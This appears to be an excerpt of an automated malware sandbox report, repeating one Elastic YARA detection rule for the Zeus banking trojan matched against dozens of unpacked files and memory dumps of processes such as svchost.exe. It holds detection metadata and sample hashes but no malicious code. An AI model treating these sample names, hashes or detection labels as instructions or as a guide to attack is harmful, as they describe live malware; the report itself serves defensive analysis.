    Source: 39.2.cUKxeliGgCix.exe.2be0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.41.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 19.2.cUKxeliGgCix.exe.2910000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.3.5AFlyarMds.exe.704510.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.3.5AFlyarMds.exe.705110.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 21.2.cUKxeliGgCix.exe.24b0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.2cf3c00.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 8.2.cUKxeliGgCix.exe.25c0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 35.2.cUKxeliGgCix.exe.2062000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.39.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 23.2.cUKxeliGgCix.exe.2e42000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 25.2.cUKxeliGgCix.exe.8f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.19.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 8.2.cUKxeliGgCix.exe.2522000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 6.2.cUKxeliGgCix.exe.23f2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 5.2.cUKxeliGgCix.exe.15e2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.19.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 5.2.cUKxeliGgCix.exe.15e2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.34.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 6.2.cUKxeliGgCix.exe.2550000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.2a60000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 15.2.cUKxeliGgCix.exe.24e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.35.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 29.2.cUKxeliGgCix.exe.2cc2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 29.2.cUKxeliGgCix.exe.2cc2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 27.2.cUKxeliGgCix.exe.14f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 39.2.cUKxeliGgCix.exe.1272000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000017.00000002.2120228960.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000000D.00000002.2347461629.0000000003100000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2125875066.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000017.00000002.2120830314.0000000003200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000005.00000002.2310035862.0000000002F60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2142779686.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2150623127.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2106522225.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000023.00000002.2141147552.00000000020C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
